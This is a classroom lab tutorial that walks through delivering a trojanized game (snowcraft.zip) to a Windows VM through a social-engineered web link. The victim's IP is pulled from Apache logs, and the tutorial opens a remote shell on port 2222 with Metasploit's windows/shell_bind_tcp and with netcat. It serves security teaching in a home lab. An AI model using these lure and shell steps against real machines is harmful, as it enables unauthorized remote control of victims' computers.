ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Trojan Horse Creation >> Current Page |Views: 16655

(Trojan Horse 1: Lesson 4)

{ Social Engineer Trojan Horse and Connect with Metasploit and Netcat }

Section 0. Background Information
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.

 

Section 1. Start Up BackTrack5R1
  1. Start Up BackTrack5R1.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  4. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  5. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • My IP address 192.168.1.105.  In your case, it will probably be different.
      • You will later use this IP Address when give the prospective Victim the web link to the Trojan Horse Game.

 

  • Section 2. Start Up BackTrack Apache Web Server

     

    1. Check if Apache Web Server is Running
      • Instructions:
        1. ps -eaf | grep apache | grep -v grep | wc -l
          • "0" was returned because the Apache Web Server is not running.
        2. /etc/init.d/apache2 start
          • This is the Apache Web Server start up script.
        3. ps -eaf | grep apache
      • Notes:
        • Apache2 comes standard with BackTrack5R1.
        • If your version of BackTrack5R1 does not come with Apache, then do the following:
          1. dpkg --get-selections | grep apache2
            • If you do not see apache2 as installed, then continue to the next step..
          2. apt-get install apache2

     

  • Section 3. Start Up Windows Machine

     

    1. Booting up W7P32B
      • Instructions:
        1. Start up VMware Player
        2. Select W7P32B
        3. Play Virtual Machine
      • Note:
        • For those of you that are not part of my class, W7P32Bis a Windows 7 32 Bit Operating System.
        • Any version of Windows can be used.
        • But you must have first completed the pre-requisite labs listed in the overview section.

       

    2. W7P32B Authentication
      • Instructions:
        1. Login as student

     

    Section 4. Start up Internet Explorer

     

    1. Start Up Internet Explorer
      • Instructions:
        1. In the search box type "Internet Explorer"
        2. Under Programs, click on Internet Explorer

       

    2. Social Engineer Game
      • Instructions:
        1. Pretending, you could simulate receiving an email with a link pointing to the Trojan Horse game.
        2. In the Windows Internet Explorer address window put in the following address:
          • http://192.168.1.105/html/games/snowcraft.zip
          • Note: Replace 192.168.1.105 with the IP Address obtained from Section 1, Step 5.
        3. Press Enter
      • .

       

    3. File Download
      • Instructions:
        1. Click Save

       

       

    4. Save File
      • Instructions:
        1. The default download location should be as follows
          •  C:\Users\student\Downloads.
        2. Click Save

       

    5. Open Folder
      • Instructions:
        1. Click on Open Folder

       

    6. Extract Zip File
      • Instructions:
        1. Right Click on snowcraft
        2. Select Extract All...

       

    7. Select a Destination and Extract Files
      • Instructions:
        1. Take the Default location
        2. Click on Extract

       

    8. Open the snowcraft folder
      • Instructions:
        1. Right Click on snowcraft
        2. Click on Open

       

    9. Play Game
      • Instructions:
        1. Double Click on the snowcraft game

     

    Section 5. Its Metasploit Time

     

    1. Obtain IP Address of Victim Machine
      • Instructions:
        1. cd /var/log/apache2
        2. grep snowcraft access.log | tail | awk '{print $1}'
      • Note:
        • You can review the Apache log called access.log for anybody that download the snowcraft.zip file.
        • In this example, we see that the Victim machine is 192.168.1.110.
        • In your case, the IP address will be different.

       

    2. Start Up Metasploit msfconsole
      • Instructions:
        1. Applications --> msfconsole --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
      • Note:
        • Metasploit takes about 5 to 20 seconds to start up

       

    3. Set Handler and Payload
      • Instructions:
        1. use multi/handler
        2. set PAYLOAD windows/shell_bind_tcp

       

    4. Set Options, Launch Exploit
      • Instructions:
        1. show options
          • LPORT - This is the port of the victim's machine.
          • RHOST - This is the IP Address of the victim's machine.
        2. set LPORT 2222
          • Remember we are running chest.exe disguished as NetCat running on port 2222.
        3. set RHOST 192.168.1.110
          • This is the IP Address you obtain in Step 1 of this section.
        4. exploit -z
          • In my past labs, I have not used the "-z".
          • The "-z" option, backgrounds the process, so we can later upgrade to a Metasploit meterpreter session.

       

    5. Set Options, Launch Exploit
      • Instructions:
        1. Now that BackTrack is now connect to the Victim's machine using port 2222.
        2. sessions -l
          • List all the Metasploit sessions.
        3. sessions -i 1
          • Use Shell Session 1

       

    6. Welcome to to the DOS prompt
      • Instructions:
        1. cd \
        2. dir
        3. echo "Your Name"
        4. date
        5. Press <Enter>
      • Partial Proof of Lab:
        1. Do a PrtScn
        2. Paste into a word document

       

    7. Exit Metasploit
      • Instructions:
        1. Press the both the <Ctrl> and <z> keys at the same time.
        2. Answer "y"
        3. exit -y

     

     

    Section 6. Use Netcat to connect to Netcat
    1. Start up a terminal window
      • Instructions:
        1. Click on the Terminal Window

       

    2. Use BackTrack's Netcat to connect to the Victim's Netcat
      • Instructions:
        1. nc -v 192.168.1.110 2222
          • In your case, use the Victim's IP address you obtained in Section 1, Step 5.
        2. dir
        3. echo "Your Name"
      • Partial Proof of Lab:
        1. Do a PrtScn
        2. Paste into the SAME word document

     

    Section 7. Proof of Lab
    1. Do Section 5, Step 5 and Section 6, Step 2.
      • Proof of Lab:
        1. Do the required PrtScn's
        2. Paste into the SAME word document
        3. Upload to Moodle

     

     

    		•


    Help ComputerSecurityStudent
    pay for continued research,
    resources & bandwidth